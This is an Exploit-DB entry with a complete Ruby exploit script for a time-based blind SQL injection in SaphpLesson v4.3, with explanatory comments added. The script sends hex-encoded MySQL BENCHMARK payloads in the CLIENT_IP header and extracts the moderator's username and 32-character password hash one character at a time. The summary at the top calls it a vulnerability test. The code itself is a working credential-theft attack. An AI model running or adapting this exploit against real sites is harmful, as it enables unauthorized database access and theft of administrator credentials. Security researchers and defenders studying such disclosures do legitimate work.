vendor:
SaphpLesson
by:
Jafer Al Zidjali
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: SaphpLesson
Affected Version From: SaphpLesson v4.3
Affected Version To: SaphpLesson v4.3
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

SaphpLesson v4.3 Exploit

This exploit is used to test for a Blind SQL Injection vulnerability in SaphpLesson v4.3. It measures the average response time and then tests for a delayed response. If the response time is more than 3 seconds, the system is vulnerable to Blind SQL Injection.

Mitigation:

The vendor has released a public patch to address this vulnerability.

Exploit-DB raw data:

#!/usr/bin/ruby

#=============================================#
#          SaphpLesson v4.3 Exploit           #
#     Blind SQL Injection Vulnerability       #
#---------------------------------------------#
# Date: 21-08-2009                            #
# Discovered & written by: Jafer Al Zidjali   #
# Email: jafer[at]scorpionds.com              #
# Website: www.scorpionds.com                 #
#---------------------------------------------#
# Notes:                                      #
#       1. Author has been notified           #
#       2. A public patch has been released   #
#=============================================#


require "net/http"
require "base64"

# Banner rows drawn by print_intro, one String per row. Built from a heredoc
# so the box art is readable in source; split("\n") drops the trailing
# newline, leaving exactly the seven rows.
intro = <<BANNER.split("\n")
+=============================================+
+          SaphpLesson v4.3 Exploit           +
+     Blind SQL Injection Vulnerability       +
+  Discovered & written by: Jafer Al Zidjali  +
+        Email: jafer[at]scorpionds.com       +
+         Website: www.scorpionds.com         +
+=============================================+
BANNER

# Types out each banner row character by character. Every character is
# followed by a spinner glyph (| / - \) that the next write overwrites with a
# backspace; the spinner phase carries over from one row to the next. After a
# row the last glyph is blanked and a newline is emitted. Returns +text+.
#
# @param text [Array<String>] banner rows, printed in order
# @return [Array<String>] the +text+ argument (result of Array#each)
def print_intro text
  spinner = ["|", "/", "-", "\\"]
  phase = 0
  text.each do |row|
    row.scan(/./) do |ch|
      STDOUT.flush
      print "\b#{ch}#{spinner[phase]}"
      phase = (phase + 1) % spinner.size
      sleep 0.04   # typewriter pacing, purely cosmetic
    end
    print "\b "
    puts ""
  end
end

print_intro intro

# Target host and script path are read interactively. Neither value is
# validated or normalised before being handed to Net::HTTP below.
puts "\nEnter host name (e.g. example.com):"
host=gets.chomp

puts "\nEnter script path (e.g. /saphplesson/):"
path=gets.chomp


# Baseline timing: five plain GETs of +path+ on port 80 with no extra header.
# Each request's wall-clock duration is stored in avgTime; the mean of the
# five (avg) is the reference the later time-based checks compare against.
puts "\nGetting average response time..."

avgTime=Array.new(5)

5.times do |c|
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path)
  w=resp.body   # body is read to completion but never inspected
  avgTime[c]=Time.now-s
  puts avgTime[c]
end

sum=0
5.times {|c| sum+=avgTime[c]}
avg=sum/5.0
# NOTE(review): the label says "average" but the value printed is avg*3.0,
# i.e. the threshold used by the s>(avg*3.0) comparisons further down.
puts "Average response time is: #{avg*3.0}"

# Calibration of the time-based probe. Each iteration sends the injection in
# the CLIENT_IP request header -- the string literal is hex-escaped and decodes
# to a MySQL "UNION SELECT IF(..., BENCHMARK(delay, ...), ...)" fragment -- with
# BENCHMARK() iteration counts of 10M, 20M, ... 50M, and prints how long each
# request took. From a detection standpoint the relevant signal is a
# CLIENT_IP header that carries SQL keywords rather than an IP address.
puts "\nTesting delayed response time..."
delTime=Array.new(5)

5.times do |t|
  delay=1000000*((t+1)*10)   # BENCHMARK() iteration count for this row
  header={
  "CLIENT_IP" =>  "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+
                  "\x20\x49\x46\x28\x31\x3d\x31\x2c\x42\x45\x4e\x43\x48\x4d"+
                  "\x41\x52\x4b\x28#{delay}\x2c\x63\x68\x61\x72\x28\x63\x68"+
                  "\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34\x33\x34\x29\x20\x23\x20"
  }
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path,header)
  w=resp.body
  s=Time.now-s
  delTime[t]=delay   # stores the iteration count, not the measured duration s
  puts "["+(t+1).to_s+"] #{s}"
end

# The user picks one of the five calibration rows (1-5). sel is later used as
# a 1-based index into delTime without any range check; an out-of-range value
# yields nil, which interpolates into the payload as an empty string.
puts "\nChoose a delyed response time (it should be > average response time):"
sel=gets.chomp

# Length probe: for z+1 in 1..20, ask whether the length of a column value
# selected from the application's moderator record (ModID=1) equals z+1,
# wrapping the "true" branch in BENCHMARK() with the delay chosen above. A
# request slower than 3x the baseline average is taken as a "true" answer and
# the loop stops; if no length in 1..20 triggers the delay, ulen stays 0 and
# the username loop below runs zero times.
print "\nGetting username length"
ulen=0

20.times do |z|
  header={
  "CLIENT_IP" =>  "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+
                  "\x20\x49\x46\x28\x6c\x65\x6e\x67\x74\x68\x28\x28\x73\x65\x6c\x65\x63\x74"+
                  "\x20\x4d\x6f\x64\x4e\x61\x6d\x65\x20\x66\x72\x6f\x6d\x20\x6d\x6f\x64\x72"+
                  "\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20\x4d\x6f\x64\x49\x44\x3d\x31"+
                  "\x29\x29\x3d#{z+1}\x2c\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+
                  "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34\x33\x34\x29\x20\x23\x20"
  }
  s=Time.now
  http = Net::HTTP.new(host, 80)
  resp= http.get(path,header)
  w=resp.body
  s=Time.now-s   # s is reused: start timestamp, then elapsed duration
  print "."
    if (s>(avg*3.0))   # delayed response => the guessed length is taken as correct
      ulen=z+1
      break;
    end
  STDOUT.flush
end

puts "\n\nUsername length: "+ ulen.to_s

# Character-by-character extraction of the same column value, one position at
# a time: for position z+1 every candidate in +chars+ is tried through a
# substring(..., z+1, 1)='c' comparison wrapped in the same BENCHMARK() delay.
# The candidate is echoed, kept on screen when the request exceeded 3x the
# baseline (the loop then moves to the next position), otherwise erased with a
# backspace. The candidate set is lowercase letters and digits only; a position
# holding any other character never matches and is left blank.
puts "\n\nUsername: "
chars="abcdefghijklmnopqrstuvwxyz0123456789"

ulen.times do |z|
  chars.scan(/./) do |c|
    header={
    "CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43"+
    "\x54\x20\x49\x46\x28\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x28\x73"+
    "\x65\x6c\x65\x63\x74\x20\x4d\x6f\x64\x4e\x61\x6d\x65\x20\x66\x72\x6f"+
    "\x6d\x20\x6d\x6f\x64\x72\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20"+
    "\x4d\x6f\x64\x49\x44\x3d\x31\x29\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27"+
    "\x2c\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+
    "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33"+
    "\x34\x33\x34\x29\x20\x23\x20"
    }
    s=Time.now
    http = Net::HTTP.new(host, 80)
    resp= http.get(path,header)
    w=resp.body
    s=Time.now-s
    print c
      if (s>(avg*3.0))   # delayed => candidate accepted, stays on screen
        break;
      end
    print "\b"   # not delayed => erase the candidate and try the next one
    STDOUT.flush
  end
end

# Same extraction loop as for the username, but against the password column
# of the moderator record: 32 positions over the hex alphabet (a 32-character
# hex string; presumably an MD5 digest, which the code itself does not
# confirm). Positions for which no hex digit produces a delay are left blank.
puts "\n\nPassword hash: "
chars="0123456789abcdef"

32.times do |z|
  chars.scan(/./) do |c|
    header={
    "CLIENT_IP" => "\x27\x20\x55\x4e\x49\x4f\x4e\x20\x53\x45\x4c\x45\x43\x54"+
    "\x20\x49\x46\x28\x73\x75\x62\x73\x74\x72\x69\x6e\x67\x28\x28\x73\x65\x6c"+
    "\x65\x63\x74\x20\x4d\x6f\x64\x50\x61\x73\x73\x77\x6f\x72\x64\x20\x66\x72"+
    "\x6f\x6d\x20\x6d\x6f\x64\x72\x65\x74\x6f\x72\x20\x77\x68\x65\x72\x65\x20"+
    "\x4d\x6f\x64\x49\x44\x3d\x31\x29\x2c#{z+1}\x2c\x31\x29\x3d\x27#{c}\x27\x2c"+
    "\x42\x45\x4e\x43\x48\x4d\x41\x52\x4b\x28#{delTime[(sel.to_i)-1]}"+
    "\x2c\x63\x68\x61\x72\x28\x63\x68\x61\x72\x28\x32\x29\x29\x29\x2c\x33\x34"+
    "\x33\x34\x29\x20\x23\x20"
    }
    s=Time.now
    http = Net::HTTP.new(host, 80)
    resp= http.get(path,header)
    w=resp.body
    s=Time.now-s
    print c
      if (s>(avg*3.0))   # delayed => hex digit accepted for this position
        break;
      end
    print "\b"   # not delayed => erase and try the next hex digit
    STDOUT.flush
  end
end

# milw0rm.com [2009-09-16]